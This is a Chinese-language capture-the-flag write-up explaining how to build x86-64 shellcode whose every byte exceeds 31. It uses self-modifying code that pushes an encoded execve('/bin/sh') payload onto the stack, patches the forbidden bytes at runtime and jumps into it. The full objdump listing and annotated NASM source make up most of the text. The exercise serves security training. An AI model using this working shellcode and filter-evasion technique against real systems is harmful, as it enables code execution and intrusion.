Shellcode——绕过31



Shellcode——绕过31

遇到了一道ctf题目,要求shellcode的每一个字节都必须大于31。

如果没有这个限制的话:

这是最方便的了。

但是必须大于31.

所以我想,那就把所有小于31的加上31(下面的代码实际加的是0x32),然后运行的时候这部分代码自己修改自己。

也就是SMC(Self-Modifying Code),即自修改代码。

要注意:
小端输入
rsp寻址

~/Desktop/111 
❯ objdump -d ./shellcode -M intel

./shellcode:     file format elf64-x86-64

Disassembly of section .text:

0000000000401000 <_start>:
401000:	48 b8 32 41 37 32 32 	movabs rax,0x3232323232374132
401007:	32 32 32 
40100a:	50                   	push   rax
40100b:	48 b8 31 f6 31 d2 b8 	movabs rax,0x32323bb8d231f631
401012:	3b 32 32 
401015:	50                   	push   rax
401016:	48 b8 2f 73 68 32 57 	movabs rax,0xe78948573268732f
40101d:	48 89 e7 
401020:	50                   	push   rax
401021:	48 b8 31 c0 48 bf 2f 	movabs rax,0x6e69622fbf48c031
401028:	62 69 6e 
40102b:	50                   	push   rax
40102c:	68 32 32 32 32       	push   0x32323232
401031:	68 32 32 32 32       	push   0x32323232
401036:	68 32 32 32 32       	push   0x32323232
40103b:	68 32 32 32 32       	push   0x32323232
401040:	8a 44 24 2b          	mov    al,BYTE PTR [rsp+0x2b]
401044:	2c 32                	sub    al,0x32
401046:	88 44 24 2b          	mov    BYTE PTR [rsp+0x2b],al
40104a:	8a 44 24 36          	mov    al,BYTE PTR [rsp+0x36]
40104e:	2c 32                	sub    al,0x32
401050:	88 44 24 36          	mov    BYTE PTR [rsp+0x36],al
401054:	8a 44 24 37          	mov    al,BYTE PTR [rsp+0x37]
401058:	2c 32                	sub    al,0x32
40105a:	88 44 24 37          	mov    BYTE PTR [rsp+0x37],al
40105e:	8a 44 24 38          	mov    al,BYTE PTR [rsp+0x38]
401062:	2c 32                	sub    al,0x32
401064:	88 44 24 38          	mov    BYTE PTR [rsp+0x38],al
401068:	8a 44 24 39          	mov    al,BYTE PTR [rsp+0x39]
40106c:	2c 32                	sub    al,0x32
40106e:	88 44 24 39          	mov    BYTE PTR [rsp+0x39],al
401072:	8a 44 24 3a          	mov    al,BYTE PTR [rsp+0x3a]
401076:	2c 32                	sub    al,0x32
401078:	88 44 24 3a          	mov    BYTE PTR [rsp+0x3a],al
40107c:	48 83 c4 20          	add    rsp,0x20
401080:	48 89 e7             	mov    rdi,rsp
401083:	ff e7                	jmp    rdi

asm代码:

;-----------------------------------------------------------------------
; _start -- CTF exercise stub in which every encoded byte must be > 31.
; Syntax: NASM (Intel operand order); target elf64-x86-64 according to
;         the objdump listing on this page.
;
; How it works (self-modifying code on the stack):
;   1. The final payload is pushed onto the stack as four qwords. Payload
;      bytes that would violate the "> 31" rule are stored with 0x32 added.
;   2. Six single-byte patches subtract 0x32 from those bytes in place.
;   3. rsp is moved to the first payload byte and control jumps there.
;
; Stack layout after all pushes (each push writes 8 bytes, little-endian):
;   rsp+0  .. rsp+31   filler from the four `push 0x32323232`
;   rsp+32 .. rsp+39   4th qword: 31 c0 48 bf 2f 62 69 6e
;   rsp+40 .. rsp+47   3rd qword: 2f 73 68 32 57 48 89 e7
;   rsp+48 .. rsp+55   2nd qword: 31 f6 31 d2 b8 3b 32 32
;   rsp+56 .. rsp+63   1st qword: 32 41 37 32 32 32 32 32
;
; Precondition: the stack must be both writable and executable. With a
; non-executable stack (NX / W^X) the final `jmp rdi` faults, so the
; technique shown here depends on that mitigation being absent.
;
; The bare numbers in the author's comments (11, 22 23, 24..31) appear to
; be 0-based payload byte indices of encoded/filler bytes; they do not line
; up with the push they sit next to -- NOTE(review): confirm with author.
;-----------------------------------------------------------------------
section .text
global _start
_start:
; open /bin/sh
        mov rax, 0x3232323232374132     ; pushed first => highest address, tail of the payload
        push rax                        ; bytes 41 37 become 0f 05 (syscall) after patching
;11
        mov rax, 0x32323bb8d231f631     ; xor esi,esi / xor edx,edx / mov eax,0x3b with encoded imm bytes
        push rax
;22 23
        mov rax, 0xe78948573268732f     ; "/sh" + encoded NUL, then push rdi / mov rdi,rsp
        push rax
;24 25 26 27 28 29 30 31
        mov rax, 0x6e69622fbf48c031     ; xor eax,eax / start of movabs rdi with "/bin"
        push rax                        ; pushed last => lowest address, payload entry point
        ; 4 x 8 = 32 filler bytes below the payload. This makes every
        ; displacement used below (0x2b..0x3a) and the later `add rsp,32`
        ; immediate (0x20) larger than 31 -- apparently the purpose of the
        ; author's "rsp addressing" note.
        push 0x32323232
        push 0x32323232
        push 0x32323232
        push 0x32323232
        ; Patch 1: rsp+0x2b, the byte after "/bin/sh": 0x32 -> 0x00 terminator.
        mov al, [rsp+31+12]
        sub al, 0x32
        mov [rsp+31+12], al
        ; Patches 2-4: rsp+0x36..0x38, upper bytes of the `mov eax` immediate:
        ; 3b 32 32 32 -> 3b 00 00 00.
        mov al, [rsp+31+23]
        sub al, 0x32
        mov [rsp+31+23], al
        mov al, [rsp+31+24]
        sub al, 0x32
        mov [rsp+31+24], al
        mov al, [rsp+31+25]
        sub al, 0x32
        mov [rsp+31+25], al
        ; Patches 5-6: rsp+0x39 and rsp+0x3a: 41 37 -> 0f 05.
        mov al, [rsp+31+26]
        sub al, 0x32
        mov [rsp+31+26], al
        mov al, [rsp+31+27]
        sub al, 0x32
        mov [rsp+31+27], al
        add rsp,32                      ; skip the filler: rsp = first payload byte
        mov rdi,rsp
        jmp rdi                         ; execute the decoded bytes on the stack (needs an executable stack)
; Commented out by the author: the tail of the sequence that now lives,
; encoded, in the pushed qwords above.
;mov rdi, rsp
;xor esi, esi
;xor edx, edx
;mov eax, 0x3b
;syscall
